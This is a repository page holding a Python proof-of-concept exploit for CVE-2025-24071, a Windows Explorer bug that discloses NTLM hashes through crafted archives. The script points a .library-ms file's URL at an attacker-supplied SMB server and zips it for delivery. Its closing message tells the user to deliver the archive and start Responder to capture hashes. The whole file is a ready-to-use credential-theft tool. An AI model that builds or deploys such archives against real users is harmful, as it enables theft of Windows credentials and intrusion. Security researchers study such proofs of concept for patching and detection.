0xvoodoo/PoCs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1f65c00ac5b17700a9949d91fb065816e012cda8
PoCs/CVE-2025-24071/CVE-2025-24071.py
T
0xVoodoo 78bdacd90d Adding CVE-2025-24071 and tweaking READMEs
2025-08-19 12:38:44 -06:00

72 lines
2.3 KiB
Python
Raw Blame History

from os import rename
from os.path import isfile
from zipfile import ZipFile
import xml.etree.ElementTree as elementTree
import argparse
#pretty colors :)
RESET = "\033[0m"
RED = "\033[31m"
GREEN = "\033[32m"
YELLOW = "\033[33m"
BOLD = "\033[1m"
def findLib(library):
if not library.endswith(".library-ms"):
library = library + ".library-ms"
if isfile(library):
pass
else:
try:
rename("mal.library-ms", library)
except (OSError, PermissionError, IsADirectoryError) as error:
print(f"{BOLD}{RED}[-]{RESET} Error renaming library!")
raise SystemExit(error)
return library
def malLib(library, server):
contents = elementTree.parse(library)
root = contents.getroot()
nameSpace = root.tag.split("}")[0].strip("{")
elementTree.register_namespace('', nameSpace)
for element in root.iter():
if element.tag.endswith("url"):
element.text = "\\\\" + server + "\\shared"
contents.write(library, encoding="utf-8", xml_declaration=True)
def mkZip(library, filename):
if not filename.endswith(".zip"):
filename = filename + ".zip"
with ZipFile(filename, "w") as malZip:
malZip.write(library)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='CVE-2025-24071.py',
description='This is a PoC for CVE-2025-24071, a bug in Windows Explorer that allows for NTLM hash disclosure via crafted archives.',
epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
parser.add_argument('-s', '--server', required=True, help='Target IP/URL')
parser.add_argument('-f', '--file', required=True, help='Output file name')
parser.add_argument('-l', '--library', help='MS Library file name (default mal.library-ms)')
args = parser.parse_args()
print("===CVE-2025-24071 PoC by 0xVoodoo===")
if args.library:
library = findLib(args.library)
else:
library = "mal.library-ms"
print(f"{BOLD}{YELLOW}[*]{RESET} Modifying library")
malLib(library, args.server)
print(f"{BOLD}{YELLOW}[*]{RESET} Creating ZIP archive")
mkZip(library, args.file)
print(f"{BOLD}{GREEN}[+]{RESET} ZIP archive created:", args.file)
print(f"{BOLD}{YELLOW}[*]{RESET} Deliver the ZIP archive and start responder")
Reference in New Issue View Git Blame Copy Permalink